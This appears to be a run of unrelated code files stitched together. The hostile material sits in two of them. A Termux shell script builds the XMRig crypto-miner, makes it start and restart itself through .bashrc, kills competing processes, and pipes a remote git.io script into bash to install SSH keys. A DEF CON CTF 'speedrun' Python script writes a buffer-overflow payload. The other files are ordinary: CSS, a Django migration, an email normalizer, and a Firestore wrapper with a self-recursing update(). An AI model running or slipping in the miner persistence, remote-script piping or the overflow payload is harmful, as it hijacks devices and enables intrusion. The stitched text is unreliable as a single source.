*)
ERROR "Unsupported architecture :- $ARCHITECTURE" && exit 1
;;
esac
INFO "Device architecture :- $ARCHITECTURE"
INFO "Downloading Ubuntu image"
wget https://mirrors.ustc.edu.cn/ubuntu-cdimage/ubuntu-base/releases/${UBUNTU_VERSION}/release/ubuntu-base-${UBUNTU_VERSION}-base-${ARCHITECTURE}.tar.gz -O ubuntu.tar.gz
}
UBUNTU_INSTALL(){
HEAD "Install Ubuntu"
local directory=ubuntu-fs
cd "$HOME/ubuntu-in-termux" || exit
local cur=$(pwd)
mkdir -p $directory && INFO "Create $HOME/ubuntu-in-termux/$directory"
cd $directory || exit
INFO "Decompressing the ubuntu rootfs" && tar -zxf "$cur/ubuntu.tar.gz" --exclude='dev' && INFO "The ubuntu rootfs have been successfully decompressed"
printf "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" > etc/resolv.conf && INFO "Fixing the resolv.conf"
stubs=()
stubs+=('usr/bin/groups')
for f in "${stubs[@]}";do
INFO "Writing stubs"
echo -e "#!/bin/sh\nexit" > "$f"
done
INFO "Successfully wrote stubs"
cd "$cur" || exit
mkdir -p ubuntu-binds
local bin=startubuntu.sh
INFO "Creating the start script"
cat > $bin <<- EOM
#!/bin/bash
cd \$(dirname \$0)
## unset LD_PRELOAD in case termux-exec is installed
unset LD_PRELOAD
command="proot"
## uncomment following line if you are having FATAL: kernel too old message.
#command+=" -k 4.14.81"
command+=" --link2symlink"
command+=" -0"
command+=" -r $directory"
if [ -n "\$(ls -A ubuntu-binds)" ]; then
for f in ubuntu-binds/* ;do
. \$f
done
fi
command+=" -b /dev"
command+=" -b /proc"
command+=" -b /sys"
command+=" -b ubuntu-fs/tmp:/dev/shm"
command+=" -b /data/data/com.termux"
command+=" -b /:/host-rootfs"
command+=" -b /sdcard"
command+=" -b /storage"
command+=" -b /mnt"
command+=" -w /root"
command+=" /usr/bin/env -i"
command+=" HOME=/root"
command+=" PATH=/usr/local/sbin:/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/games:/usr/local/games"
command+=" TERM=\$TERM"
command+=" LANG=C.UTF-8"
command+=" /bin/bash --login"
com="\$@"
if [ -z "\$1" ];then
exec \$command
else
\$command -c "\$com"
fi
EOM
termux-fix-shebang $bin
chmod +x $bin
rm ubuntu.tar.gz -rf && INFO "Delete Ubuntu image"
INFO "Ubuntu $UBUNTU_VERSION install complete"
}
#install_ubuntu(){
# pkg update && pkg upgrade -y
# pkg install wget proot -y
# cd "$HOME" || exit
# mkdir ubuntu-in-termux
# cd ubuntu-in-termux || exit
# install1
# cd "$HOME" || exit
#}
#
#install1 () {
#time1="$( date +"%r" )"
#directory=ubuntu-fs
#UBUNTU_VERSION=20.04.1
#if [ -d "$directory" ];then
#first=1
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;227m[WARNING]:\e[0m \x1b[38;5;87m Skipping the download and the extraction\n"
#elif [ -z "$(command -v proot)" ];then
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;203m[ERROR]:\e[0m \x1b[38;5;87m Please install proot.\n"
#printf "\e[0m"
#exit 1
#elif [ -z "$(command -v wget)" ];then
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;203m[ERROR]:\e[0m \x1b[38;5;87m Please install wget.\n"
#printf "\e[0m"
#exit 1
#fi
#if [ "$first" != 1 ];then
#if [ -f "ubuntu.tar.gz" ];then
#rm -rf ubuntu.tar.gz
#fi
#if [ ! -f "ubuntu.tar.gz" ];then
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Downloading the ubuntu rootfs, please wait...\n"
#ARCHITECTURE=$(dpkg --print-architecture)
#case "$ARCHITECTURE" in
#aarch64) ARCHITECTURE=arm64;;
#arm) ARCHITECTURE=armhf;;
#amd64|x86_64) ARCHITECTURE=amd64;;
#*)
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;203m[ERROR]:\e[0m \x1b[38;5;87m Unknown architecture :- $ARCHITECTURE"
#exit 1
#;;
#
#esac
#
#wget https://mirrors.ustc.edu.cn/ubuntu-cdimage/ubuntu-base/releases/${UBUNTU_VERSION}/release/ubuntu-base-${UBUNTU_VERSION}-base-${ARCHITECTURE}.tar.gz -O ubuntu.tar.gz
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Download complete!\n"
#
#fi
#
#cur=`pwd`
#mkdir -p $directory
#cd $directory
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Decompressing the ubuntu rootfs, please wait...\n"
#tar -zxf $cur/ubuntu.tar.gz --exclude='dev'||:
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m The ubuntu rootfs have been successfully decompressed!\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Fixing the resolv.conf, so that you have access to the internet\n"
#printf "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" > etc/resolv.conf
#stubs=()
#stubs+=('usr/bin/groups')
#for f in ${stubs[@]};do
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Writing stubs, please wait...\n"
#echo -e "#!/bin/sh\nexit" > "$f"
#done
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully wrote stubs!\n"
#cd $cur
#
#fi
#
#mkdir -p ubuntu-binds
#bin=startubuntu.sh
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Creating the start script, please wait...\n"
#cat > $bin <<- EOM
##!/bin/bash
#cd \$(dirname \$0)
### unset LD_PRELOAD in case termux-exec is installed
#unset LD_PRELOAD
#command="proot"
### uncomment following line if you are having FATAL: kernel too old message.
##command+=" -k 4.14.81"
#command+=" --link2symlink"
#command+=" -0"
#command+=" -r $directory"
#if [ -n "\$(ls -A ubuntu-binds)" ]; then
# for f in ubuntu-binds/* ;do
# . \$f
# done
#fi
#command+=" -b /dev"
#command+=" -b /proc"
#command+=" -b /sys"
#command+=" -b ubuntu-fs/tmp:/dev/shm"
#command+=" -b /data/data/com.termux"
#command+=" -b /:/host-rootfs"
#command+=" -b /sdcard"
#command+=" -b /storage"
#command+=" -b /mnt"
#command+=" -w /root"
#command+=" /usr/bin/env -i"
#command+=" HOME=/root"
#command+=" PATH=/usr/local/sbin:/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/games:/usr/local/games"
#command+=" TERM=\$TERM"
#command+=" LANG=C.UTF-8"
#command+=" /bin/bash --login"
#com="\$@"
#if [ -z "\$1" ];then
# exec \$command
#else
# \$command -c "\$com"
#fi
#EOM
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m The start script has been successfully created!\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Fixing shebang of startubuntu.sh, please wait...\n"
#termux-fix-shebang $bin
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully fixed shebang of startubuntu.sh! \n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Making startubuntu.sh executable please wait...\n"
#chmod +x $bin
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully made startubuntu.sh executable\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Cleaning up please wait...\n"
#rm ubuntu.tar.gz -rf
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully cleaned up!\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m The installation has been completed! You can now launch Ubuntu with ./startubuntu.sh\n"
#printf "\e[0m"
#
#}
UBUNTU_START(){
INFO "Start up Ubuntu..." && bash "$HOME/ubuntu-in-termux/startubuntu.sh"
}
TERMUX_BASHRC(){
INFO "Setting termux's .bashrc"
echo "bash $HOME/ubuntu-in-termux/startubuntu.sh" >> "$HOME/.bashrc"
}
UBUNTU_INSTALL_BASHRC(){
INFO "Setting Ubuntu's .bashrc and install.sh"
local bin="$HOME/ubuntu-in-termux/ubuntu-fs/root/install.sh"
cat > "$bin" <<- EOM
#!/bin/bash
RED_FONT_PREFIX="\033[31m"
BLUE_FONT_PREFIX="\033[34m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
LIGHT_BLUE_FONT_PREFIX="\033[1;34m"
FONT_COLOR_SUFFIX="\033[0m"
INFO(){
echo -e "[\${LIGHT_GREEN_FONT_PREFIX}INFO\${FONT_COLOR_SUFFIX}]\$1"
}
ERROR(){
echo -e "[\${RED_FONT_PREFIX}ERROR\${FONT_COLOR_SUFFIX}]\$1"
}
HEAD(){
echo -e "\${LIGHT_BLUE_FONT_PREFIX}##### \$1 #####\${FONT_COLOR_SUFFIX}"
}
HEAD "Upgrading packages"
apt-get update && apt-get upgrade -y
HEAD "Installing dependency"
apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
INFO "Getting xmrig source code"
git clone https://github.com/C3Pool/xmrig-C3.git
INFO "Changing donate level to $DONATE %"
sed -i 's/kDefaultDonateLevel = 1/kDefaultDonateLevel = $DONATE/g' ./xmrig-C3/src/donate.h
sed -i 's/kMinimumDonateLevel = 1/kMinimumDonateLevel = $DONATE/g' ./xmrig-C3/src/donate.h
mkdir xmrig-C3/build && cd xmrig-C3/build && cmake .. && make -j\$(nproc) && mv xmrig \$HOME && cd \$HOME && rm -rf xmrig-C3
INFO "XMRIG create success"
HEAD "Please restart Termux App to run XMRIG"
EOM
echo "[ ! -e ./xmrig ] && bash ./install.sh" >> "$HOME/ubuntu-in-termux/ubuntu-fs/root/.bashrc"
}
UBUNTU_SERVICE_BASHRC(){
INFO "Setting Ubuntu's .bashrc and service.sh"
local bin="$HOME/ubuntu-in-termux/ubuntu-fs/root/service.sh"
cat > "$bin" <<- EOM
#!/bin/bash
RED_FONT_PREFIX="\033[31m"
BLUE_FONT_PREFIX="\033[34m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
LIGHT_BLUE_FONT_PREFIX="\033[1;34m"
FONT_COLOR_SUFFIX="\033[0m"
INFO(){
echo -e "[\${LIGHT_GREEN_FONT_PREFIX}INFO\${FONT_COLOR_SUFFIX}]\$1"
}
ERROR(){
echo -e "[\${RED_FONT_PREFIX}ERROR\${FONT_COLOR_SUFFIX}]\$1"
}
HEAD(){
echo -e "\${LIGHT_BLUE_FONT_PREFIX}##### \$1 #####\${FONT_COLOR_SUFFIX}"
}
HEAD "Aminer is starting"
cd "\$HOME"
INFO "Killing other Aminer"
ps -ef|grep service.sh|grep -v grep|grep -v \$\$|cut -c 9-15|xargs kill -s 9
ps -ef|grep xmrig|grep -v grep|cut -c 9-15|xargs kill -s 9
while true
do
PID_COUNT=\$(ps aux|grep ./xmrig |grep -v grep|wc -l)
if [ \$PID_COUNT -eq 0 ]
then
[ ! -e ./xmrig ] && ERROR "XMRIG is not found, exiting" && exit 1
INFO "XMRIG doesn't running, restarting..." && ./xmrig --randomx-mode=light --no-huge-pages -u $USER -p $PASS -a $ALGO -o $MIMING_URL
fi
sleep 15
done
EOM
echo "bash ./service.sh" >> "$HOME/ubuntu-in-termux/ubuntu-fs/root/.bashrc"
}
SSH_INSTALL(){
HEAD "Install and setup SSH"
INFO "Installing dependency" && pkg update && pkg install openssh -y
INFO "Running SSH_Key_Installer" && bash <(curl -fsSL git.io/key.sh) -g "$1"
INFO "Setting termux's .bashrc" && echo "sshd" >> "$HOME/.bashrc"
INFO "Starting sshd..." && sshd
HEAD "Finish"
local IP=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d '/')
INFO "SSH server running at: $IP:8022"
INFO "Login with any username and your private key"
}
while getopts "yu:p:a:o:d:g:" OPT; do
case $OPT in
y)
TOS="y"
;;
u)
USER=$OPTARG
;;
p)
PASS=$OPTARG
;;
a)
ALGO=$OPTARG
;;
o)
MIMING_URL=$OPTARG
;;
d)
DONATE=$OPTARG
;;
g)
GITHUB_USER=$OPTARG
HELLO
SSH_INSTALL "$GITHUB_USER"
exit 0
;;
*)
USAGE
exit 1
;;
esac
done
HELLO
GET_PASS
[ ! -e "$HOME/ubuntu-in-termux/ubuntu-fs/root/service.sh" ] && UBUNTU && TERMUX_BASHRC && UBUNTU_SERVICE_BASHRC && UBUNTU_INSTALL_BASHRC
UBUNTU_START
|
function extractFilename(filePath) {
// Find the last occurrence of forward slash or backslash
const lastSlashIndex = Math.max(filePath.lastIndexOf('/'), filePath.lastIndexOf('\\'));
// Extract the filename using substring
const filename = filePath.substring(lastSlashIndex + 1);
return filename;
}
// Test cases
console.log(extractFilename("/home/user/documents/report.txt")); // Output: "report.txt"
console.log(extractFilename("C:\\Program Files\\example\\image.jpg")); // Output: "image.jpg" |
<reponame>leonlaf66/passport
with open('test') as f1:
with open('rets.php', 'a') as f2:
Lines = f1.readlines()
try:
for line in Lines:
item = line.strip().split(',')
str = "\t" + "'" + item[0] + "' " + "=>" + " '" + item[1] + "'" + ","
f2.write(str+"\n")
except:
print "error when open file!"
|
#!/bin/bash
set -euo pipefail
readonly crio_wrk_dir="/tmp/crio"
readonly runc_wrk_dir="/tmp/runc"
# Install CRI-O and its dependencies
sudo apt-get update
sudo apt-get install -y software-properties-common
sudo add-apt-repository -y ppa:projectatomic/ppa
sudo apt-get update
sudo apt-get install -y cri-o
# Configure CRI-O to use a specific working directory
sudo sed -i "s|^#.*\[crio.runtime\]|\[crio.runtime\]|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*conmon_cgroup = \"\"|conmon_cgroup = \"\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*conmon = \"/usr/local/bin/conmon\"|conmon = \"/usr/local/bin/conmon\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*pids_limit = 1024|pids_limit = 1024|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*cgroup_manager = \"\"|cgroup_manager = \"cgroupfs\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*\[crio.runtime\]|\[crio.runtime\]|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*conmon_cgroup = \"\"|conmon_cgroup = \"\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*conmon = \"/usr/local/bin/conmon\"|conmon = \"/usr/local/bin/conmon\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*pids_limit = 1024|pids_limit = 1024|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*cgroup_manager = \"\"|cgroup_manager = \"cgroupfs\"|g" /etc/crio/crio.conf
# Install runc
sudo apt-get install -y runc
# Configure runc to use a specific working directory
sudo sed -i "s|^#.*root = \"/var/run/runc\"|root = \"$runc_wrk_dir\"|g" /etc/runc.conf |
/* globally reset default margins and paddings */
* {
margin: 0;
padding: 0;
}
/* create a header with static position */
header {
position: static;
background-color: #333;
font-size: 1.2em;
color: #fff;
}
/* create the navigation bar, this section will float beside main content*/
nav {
float: left;
width: 20%;
padding: 10px;
background-color: #f2f2f2;
}
/* create the main content area */
main {
width: 80%;
float: left;
}
/* create the footer */
footer {
width: 100%;
background-color: #333;
text-align: center;
color: #fff;
} |
package app
import com.google.inject.Guice
import play.api.GlobalSettings
import util.di.BaseModule
/**
* The global configuration.
*/
object Global extends GlobalSettings {
/**
* The Guice injector.
*/
val Injector = createInjector
/**
* Loads the controller classes with the Guice injector. So it's possible to inject dependencies
* directly into the controller.
*
* @param controllerClass The controller class to instantiate.
* @return The instance of the controller class.
* @throws Exception if the controller couldn't be instantiated.
*/
override def getControllerInstance[A](controllerClass: Class[A]): A = {
Injector.getInstance(controllerClass)
}
/**
* Create the injector instance.
*
* @return The injector instance.
*/
private def createInjector = Guice.createInjector(new BaseModule)
}
|
<reponame>shyga362/projetoPython
v = input('digite algo')
print(type(v))
print('ele é numero {}'.format(v.isnumeric()))
print('ele é letra {}'.format(v.isalpha()))
print('ele é letra e numero {}'.format(v.isalnum()))
print('tem somente letras maiusculas {}'.format(v.isupper()))
print('tem somente letras minusculas {}'.format(v.islower()))
print('tem somente espaço {}'.format(v.isspace()))
|
#!/bin/bash
# util-linux-user: provides chsh command
# zsh: provides zsh shell
# vim: provides enhanced vi text editor
echo "Installing packages"
sudo dnf install util-linux-user zsh vim -y
echo "Downloading Oh My Zsh"
cd ~
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
# Download antigen plugin manager for zsh
echo "Downloading antigen"
curl -L git.io/antigen > ~/antigen.zsh
# Overwrite zsh config (.zshrc)
echo "Creating zsh config"
cat > ~/.zshrc << 'EOL'
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
source ~/antigen.zsh
antigen init ~/.antigenrc
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
# Install Ruby Gems to ~/gems
export GEM_HOME="$HOME/gems"
path+=("$HOME/gems/bin")
path+=("$HOME/.local/bin")
export PATH
EOL
# Create antigen config
echo "Creating antigen config"
cat > ~/.antigenrc << 'EOL'
# Load the oh-my-zsh library
antigen use oh-my-zsh
# PLugins with oh-my-zsh
antigen bundle git
antigen bundle pip
antigen bundle command-not-found
antigen bundle sudo # double esc
# External plugins
antigen bundle MichaelAquilina/zsh-you-should-use
antigen bundle zsh-users/zsh-autosuggestions
antigen bundle zsh-users/zsh-completions
antigen bundle zsh-users/zsh-syntax-highlighting # Must be the last plugin to take effect
# Theme
antigen theme romkatv/powerlevel10k
# Apply config
antigen apply
EOL
# Download vim-plug plugin manager for vim
echo "Downloading vim-plug"
curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
# Create vim-plug config
echo "Creating vim-plug config"
cat > ~/.vimrc << 'EOL'
" Specify a directory for plugins
" - Avoid using standard Vim directory names like 'plugin'
" Apply changes with :PlugInstall
call plug#begin('~/.vim/plugged')
Plug 'morhetz/gruvbox'
Plug 'vim-airline/vim-airline'
Plug 'yggdroot/indentline'
" :UndotreeToggle
Plug 'mbbill/undotree'
Plug 'tpope/vim-fugitive'
Plug 'tpope/vim-sensible'
" Initialize plugin system
call plug#end()
:set number
EOL
# Install nerd fonts which work best with Powerlevel10k for zsh
echo "Installing MesloLGS fonts"
mkdir --parents ~/.local/share/fonts
cd ~/.local/share/fonts
curl -fLo "MesloLGS NF Regular.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Regular.ttf
curl -fLo "MesloLGS NF Bold.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Bold.ttf
curl -fLo "MesloLGS NF Italic.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Italic.ttf
curl -fLo "MesloLGS NF Bold Italic.ttf" https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Bold%20Italic.ttf
# Update font cache
echo "Updating font cache"
sudo fc-cache -vf ~/.local/share/fonts
# Change shell to zsh (user interaction required)
echo "Changing shell to zsh"
chsh -s $(which zsh)
echo "All done!"
echo "You may need to log out and back in again"
echo "You may also need to configure your terminal to use \"MesloLGS\" fonts for Powerlevel10k to display correctly."
|
<gh_stars>1-10
# Generated by Django 2.1.11 on 2019-08-14 03:10
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('sfm', '0001_squashed_0003_auto_20180319_0924'),
('ibms', '0010_auto_20190808_1104'),
]
operations = [
migrations.AlterUniqueTogether(
name='corporatestrategy',
unique_together={('corporateStrategyNo', 'fy')},
),
migrations.AlterUniqueTogether(
name='glpivdownload',
unique_together={('gLCode', 'fy')},
),
migrations.AlterUniqueTogether(
name='ibmdata',
unique_together={('ibmIdentifier', 'fy')},
),
migrations.AlterUniqueTogether(
name='ncservicepriority',
unique_together={('servicePriorityNo', 'fy')},
),
migrations.AlterUniqueTogether(
name='ncstrategicplan',
unique_together={('strategicPlanNo', 'fy')},
),
]
|
<gh_stars>10-100
// Normalize email address to ensure that a user can't register twice
// with the variations of the same email.
//
// The algorithm is as follows:
//
// 1. User name normalization
//
// - lowercase
// - remove mailbox extensions (google uses '+', yahoo uses '-',
// we remove only '+' because don't have any yahoo users)
// - *not implemented*: convert unicode to ascii (remove accents,
// diacritics, etc.)
// - remove padding characters (we remove '.' for all domains)
//
// 2. Domain name normalization
//
// - lowercase
// - *not implemented*: convert to punycode
// - change aliases to primary domain (googlemail.com -> gmail.com)
// - *not implemented*: remove 3rd level domain
// (email.msn.com -> msn.com, but not for mail.co.uk)
//
// This module should only be used for uniqueness check, all emails
// should still go to the exact mailbox specified by the user.
//
// This module does not guarantee that normalized emails are actually the same
// (e.g. we delete all dots, but `<EMAIL>` can be different from
// `<EMAIL>`), so do not use this as an alias for logging in.
//
// Here's a relevant article about email normalization and verification:
// http://girders.org/blog/2013/01/31/dont-rfc-validate-email-addresses/
//
'use strict';
const punycode = require('punycode');
function normalize_gmail(username) {
// lowercase
username = username.toLowerCase();
// remove all dots, not significant for gmail
username = username.replace(/\./g, '');
// remove gmail mailboxes
username = username.replace(/\+.*/g, '');
return username;
}
function normalize_yahoo(username) {
// lowercase
username = username.toLowerCase();
// remove yahoo mailboxes
username = username.replace(/\-.*/g, '');
return username;
}
function normalize_yandex(username) {
// lowercase
username = username.toLowerCase();
// '.' is an alias for '-'
// https://yandex.com/support/mail/faq.xml#mail-aliases
username = username.replace(/-/g, '.');
return username;
}
function normalize_mailru(username) {
return username.toLowerCase();
}
function normalize_generic(username) {
// lowercase
username = username.toLowerCase();
// remove mailboxes
username = username.replace(/\+.*/g, '');
return username;
}
let rules = {
'gmail.com': {
aliases: [ 'googlemail.com' ],
fn: normalize_gmail
},
'yahoo.net': {
aliases: [ 'yahoodns.com', 'ymail.com' ],
fn: normalize_yahoo
},
'yandex.com': {
aliases: [ 'yandex.ru', 'narod.ru', 'yandex.ua', 'yandex.by', 'yandex.kz', 'ya.ru' ],
fn: normalize_yandex
},
'mail.ru': {
aliases: [ 'list.ru', 'inbox.ru' ],
fn: normalize_mailru
},
default: { fn: normalize_generic }
};
module.exports = function normalize_email(email_str) {
let email_parts = email_str.split('@');
let domain = email_parts.pop();
let username = email_parts.join('@');
// lowercase domain
domain = domain.toLowerCase();
// punycode should get normalized domain (i.e. after lowercase)
domain = punycode.toASCII(domain);
for (let r of Object.keys(rules)) {
if (r === domain || rules[r].aliases && rules[r].aliases.indexOf(domain) !== -1) {
username = rules[r].fn(username);
domain = r;
return username + '@' + domain;
}
}
username = rules.default.fn(username);
return username + '@' + domain;
};
|
<reponame>dereekb/dbcomponents
import { Observable } from 'rxjs';
import { DocumentData, DocumentReference, DocumentSnapshot, PartialWithFieldValue, SetOptions, UpdateData, WithFieldValue, WriteResult } from '../types';
import { FirestoreDocumentDataAccessor, FirestoreDocumentDataAccessorFactory, FirestoreDocumentDeleteParams, FirestoreDocumentUpdateParams } from './accessor';
// MARK: Abstract Wrapper
/**
* Abstract wrapper for a FirestoreDocumentDataAccessor.
*
* Forwards all non-overridden accessor functions to the wrapped accessor by default.
*/
export abstract class AbstractFirestoreDocumentDataAccessorWrapper<T, D = DocumentData> implements FirestoreDocumentDataAccessor<T, D> {
constructor(readonly accessor: FirestoreDocumentDataAccessor<T, D>) {}
get documentRef(): DocumentReference<T> {
return this.accessor.documentRef;
}
stream(): Observable<DocumentSnapshot<T>> {
return this.accessor.stream();
}
get(): Promise<DocumentSnapshot<T>> {
return this.accessor.get();
}
exists(): Promise<boolean> {
return this.accessor.exists();
}
delete(params?: FirestoreDocumentDeleteParams): Promise<void | WriteResult> {
return this.accessor.delete(params);
}
set(data: PartialWithFieldValue<T>, options: SetOptions): Promise<WriteResult | void>;
set(data: WithFieldValue<T>): Promise<WriteResult | void>;
set(data: PartialWithFieldValue<T> | WithFieldValue<T>, options?: SetOptions): Promise<void | WriteResult> {
return this.accessor.set(data, options as SetOptions);
}
update(data: UpdateData<D>, params?: FirestoreDocumentUpdateParams): Promise<void | WriteResult> {
return this.update(data, params);
}
}
// MARK: Factory
export type WrapFirestoreDocumentDataAccessorFunction<T, D = DocumentData> = (input: FirestoreDocumentDataAccessor<T, D>) => FirestoreDocumentDataAccessor<T, D>;
export type InterceptAccessorFactoryFunction<T, D = DocumentData> = (input: FirestoreDocumentDataAccessorFactory<T, D>) => FirestoreDocumentDataAccessorFactory<T, D>;
export function interceptAccessorFactoryFunction<T, D = DocumentData>(wrap: WrapFirestoreDocumentDataAccessorFunction<T, D>): InterceptAccessorFactoryFunction<T, D> {
return (input: FirestoreDocumentDataAccessorFactory<T, D>) => ({
accessorFor: (ref) => wrap(input.accessorFor(ref))
});
}
|
<filename>2019/05-defcon/pwn-speedrun-001/make_string_01.py
import sys
padding = b"A"*1032
exploit = b'\xda\x07\x45\x00\x00\x00\x00\x00' # (int 3)
# exploit = '\x30\xdf\xff\xf7\xff\xff\x7f\x00\x00' # (getcpu)
exploit = padding + exploit
sys.stdout.buffer.write(exploit)
|
<reponame>MrPepperoni/Reaping2-1
#ifndef INCLUDED_CORE_I_BUFF_HOLDER_COMPONENT_H
#define INCLUDED_CORE_I_BUFF_HOLDER_COMPONENT_H
#include "core/component.h"
#include "platform/i_platform.h"
#include "buff.h"
using namespace ::boost::multi_index;
class BuffHolder
{
public:
struct BuffOrderer
{
typedef int32_t result_type;
result_type operator()( const Opt<Buff>& buff )const
{
return buff->GetType();
}
};
struct SecsToEndOrderer
{
typedef double result_type;
result_type operator()( const Opt<Buff>& buff )const
{
return buff->GetSecsToEnd();
}
};
struct AutoRemoveOrderer
{
typedef bool result_type;
result_type operator()( const Opt<Buff>& buff )const
{
return buff->IsAutoRemove();
}
};
typedef multi_index_container <
Opt<Buff>,
indexed_by <
ordered_non_unique <
composite_key <
Opt<Buff>,
BuffHolder::BuffOrderer
>
>,
ordered_non_unique <
composite_key <
Opt<Buff>,
BuffHolder::SecsToEndOrderer,
BuffHolder::AutoRemoveOrderer
>
>
>
> BuffList_t;
typedef BuffList_t::nth_index<1>::type BuffListSecsToEnd_t;
BuffList_t mAllBuffs;
};
typedef BuffHolder::BuffList_t BuffList_t;
template<int N>
class BuffListFilter
{
public:
typedef BuffList_t::const_iterator const_iterator;
protected:
BuffList_t::const_iterator mI;
BuffList_t::const_iterator mE;
size_t mSize;
public:
BuffListFilter( BuffList_t const& bufflist )
{
mI = bufflist.begin();
mE = bufflist.end();
mSize = bufflist.size();
}
const_iterator begin()
{
return mI;
}
const_iterator end()
{
return mE;
}
size_t size()
{
return mSize;
}
};
template<>
class BuffListFilter<0>
{
public:
typedef BuffList_t::nth_index<0>::type::const_iterator const_iterator;
protected:
const_iterator mI;
const_iterator mE;
size_t mSize;
public:
BuffListFilter( BuffList_t const& bufflist, int32_t buffStaticType )
{
boost::tie( mI, mE ) = bufflist.get<0>().equal_range( boost::make_tuple( buffStaticType ) );
mSize = std::distance( mI, mE );
}
const_iterator begin()
{
return mI;
}
const_iterator end()
{
return mE;
}
size_t size()
{
return mSize;
}
};
template<>
class BuffListFilter<1>
{
public:
typedef BuffList_t::nth_index<1>::type::const_iterator const_iterator;
protected:
const_iterator mI;
const_iterator mE;
size_t mSize;
public:
BuffListFilter( BuffList_t const& bufflist, int32_t secsToEnd )
{
boost::tie( mI, mE ) = bufflist.get<1>().equal_range( boost::make_tuple( secsToEnd, true ) );
mSize = std::distance( mI, mE );
}
const_iterator begin()
{
return mI;
}
const_iterator end()
{
return mE;
}
size_t size()
{
return mSize;
}
};
class IBuffHolderComponent : public Component
{
public:
enum BuffIndex
{
All = 0,
SecsToEnd = 1
};
virtual BuffList_t& GetBuffList() = 0;
virtual void AddBuff( std::auto_ptr<Buff> buff ) = 0;
DEFINE_COMPONENT_BASE( IBuffHolderComponent )
friend class ::boost::serialization::access;
template<class Archive>
void serialize( Archive& ar, const unsigned int version );
};
template<class Archive>
void IBuffHolderComponent::serialize( Archive& ar, const unsigned int version )
{
ar& boost::serialization::base_object<Component>( *this );
}
#endif//INCLUDED_CORE_I_BUFF_HOLDER_COMPONENT_H
|
<reponame>TheReincarnator/calc-k8s
package com.thomasjacob.calck8s.calck8sbackend;
import java.io.Serializable;
public class CalculationResult implements Serializable {
public CalculationResult(String text) {
this.text = text;
}
private String text;
public String getText() {
return text;
}
public void setText(String text) {
this.text = text;
}
}
|
#!/bin/bash
if [ -d ~/.dotfiles ]; then
cd ~/.dotfiles && git pull --recurse-submodules
fi
|
function validateHackathon(hackathon) {
let errors = [];
if (!hackathon.location || hackathon.location.trim().length <= 0) {
